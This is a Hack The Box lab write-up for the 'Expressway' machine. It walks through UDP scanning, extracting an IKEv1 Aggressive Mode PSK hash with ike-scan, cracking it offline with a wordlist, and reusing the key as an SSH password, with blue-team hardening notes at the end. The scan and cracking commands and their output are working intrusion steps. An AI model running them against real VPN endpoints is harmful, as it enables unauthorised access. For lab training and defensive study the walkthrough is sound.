Skip to content
🎁 Giveaway alert! Win a CRTA or MCRTA certification! 👉 Join our Telegram to participate!

Expressway — HTB Writeup

Platform: Linux
Host: 10.129.113.8
Difficulty: Easy
Author: NoSec

wanna go deeper? unlock short videos & early root chains by joining backdoor crew

💀 join the backdoor crew

Recon

First shot, as usual: a quick TCP port scan. If you only see one or two ports open, don’t chill yet — a lot of “quiet” boxes say the interesting stuff over UDP.

nmap -sVC 10.129.113.8

Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 00:22 CEST
Nmap scan report for 10.129.113.8
Host is up (0.033s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.46 seconds

Only SSH shows up, which by itself is meh. This is the point where people start brute-forcing — don’t. Check UDP too: VPNs, TFTP, DHCP, DNS, etc. love to hide there.

nmap -sU --top-ports 100 10.129.113.8

Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 00:23 CEST
Nmap scan report for 10.129.113.8
Host is up (0.15s latency).
Not shown: 96 closed udp ports (port-unreach)
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
500/udp  open          isakmp
4500/udp open|filtered nat-t-ike

Nmap done: 1 IP address (1 host up) scanned in 141.66 seconds

Why does this matter?

  • UDP/500 (ISAKMP) and UDP/4500 (NAT‑T) scream IPsec / IKE. If the server is on IKEv1 Aggressive Mode with a PSK (pre‑shared key), you can crack it offline. That’s gold.
  • UDP/69 (TFTP) often hosts device configs (routers/APs). Not the main lead here, the real win is IKE.

So we throw ike-scan at it.

ike-scan -M 10.129.113.8

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.113.8    Main Mode Handshake returned
        HDR=(CKY-R=04ec1a9db3726275)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.042 seconds (24.00 hosts/sec).  1 returned handshake; 0 returned notify

Main Mode confirms PSK and the retro suite (3DES/SHA1/modp1024). Promising, but Main Mode alone won’t hand you an offline‑crackable blob. We want Aggressive Mode.

ike-scan -M --aggressive 10.129.113.8

Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.113.8    Aggressive Mode Handshake returned
        HDR=(CKY-R=261e81de0f8d9a62)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.545 seconds (1.83 hosts/sec).  1 returned handshake; 0 returned notify

What exactly are we seeing?

  • ID=ike@expressway.htb: that’s the peer ID (user FQDN). In Aggressive Mode the server throws the ID early, and combined with other params that’s enough to compute/verify the PSK hash offline.
  • Hash(20 bytes): the verification hash derived from the PSK, ID, and IKE params. If you guess the PSK and compute the same hash → you win.

Next: dump a crackable blob for psk-crack. We also pass the ID so the tool uses the same context the server did.

ike-scan -M --aggressive --id=ike@expressway.htb 10.129.113.8 --pskcrack=psk.txt

Now hit it with a wordlist. I used vanilla rockyou here, but feel free to go aggressive with rules/hybrids/custom lists.

psk-crack -d /usr/share/wordlists/rockyou.txt psk.txt

Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freak<PASS>" matches SHA1 hash 5d6232c869d1<HASH>
Ending psk-crack: 8045040 iterations in 8.402 seconds (957533.11 iterations/sec)

Why does this work?

Aggressive Mode + PSK is just a bad combo. The protocol leaks enough right at the start to let you brute offline, so you’re not hammering the box — you’re crunching locally for as long as you want. If the PSK is human (in a list or hit by a rule), it breaks.

Pro tip: if psk-crack doesn’t land, hashcat supports this too (Mode 530: IKE Aggressive Mode PSK). Slap on rules (best64, dive, hob0rules, etc.) and your hit rate will be way better than plain rockyou.

Cool, we got the PSK. Now what? In labs and in real life you’ll often see password reuse: the VPN PSK (or a flavor of it) is also an SSH user’s password. Same story here — that string worked for the ike user. Log in, grab the user flag, done.

If it doesn’t line up for you: enumerate usernames first (services on the box, configs, banners, domain/realm, or the ID straight from the handshake like ike@expressway.htb), and try the PSK with those. If creds are totally different, UDP/69 (TFTP) or other services’ logs/configs can leak more hints — wasn’t needed here though.

# (ssh login and user flag retrieval happened here – commands and outputs are intentionally omitted)

TL;DR,

  • Only SSH on TCP? Don’t stop. Run an UDP scan. That’s where the win was.
  • UDP/500 + 4500 → IKE/IPsec. If it’s Aggressive Mode + PSK, do an offline PSK crack.
  • ike-scan conveniently printed the ID (ike@expressway.htb), exactly what you need for a valid hash context.
  • psk-crack (or hashcat m=530) tears through a weak PSK.
  • Password reuse: the cracked PSK often doubles as SSH creds. That’s your user foothold.

If it’s not working, try this

  • No Aggressive Mode response?
    Try --aggressive --id=<something@domain> with different IDs (hostnames, users, email-ish strings). Some stacks only talk nicely for certain IDs.
  • PSK won’t crack?
    Switch to hashcat (m530), add rules, and bring a custom wordlist (company/box names, seasons/years, punctuation, 123, etc.).
  • PSK doesn’t log you into SSH?
    Check the environment: UDP/69 TFTP, /srv/tftp, config backups; or local user lists/crumbs. Same patterns often pop up elsewhere.

Blue-team notes (why this box is “easy”)

  • Don’t deploy IKEv1 Aggressive Mode with PSK. Seriously. If you must, use a long, random PSK (not in any wordlist), but really just go IKEv2 with certs.
  • Avoid password reuse. VPN PSK ≠ SSH user password.
  • Trim UDP services. Don’t listen on stuff you don’t need (TFTP is especially spicy).

Takeaway

This is a textbook “TCP looks boring, UDP prints money” situation. A bit of protocol clue (how IKE Aggressive Mode behaves) + a basic wordlist = user shell. Don’t overthink it — right order only: UDP scan → ike-scan → PSK crack → SSH. Ship it. 🏴‍☠️

🔐 Root part is only available in the private Telegram group while the box is active in Season 8. 👉 Join for the full writeup, extra tips and exclusive content: 📡 https://t.me/nosecpwn

☕ invite me for a coffee so i don’t fall asleep writing the next writeup

💻 support nosec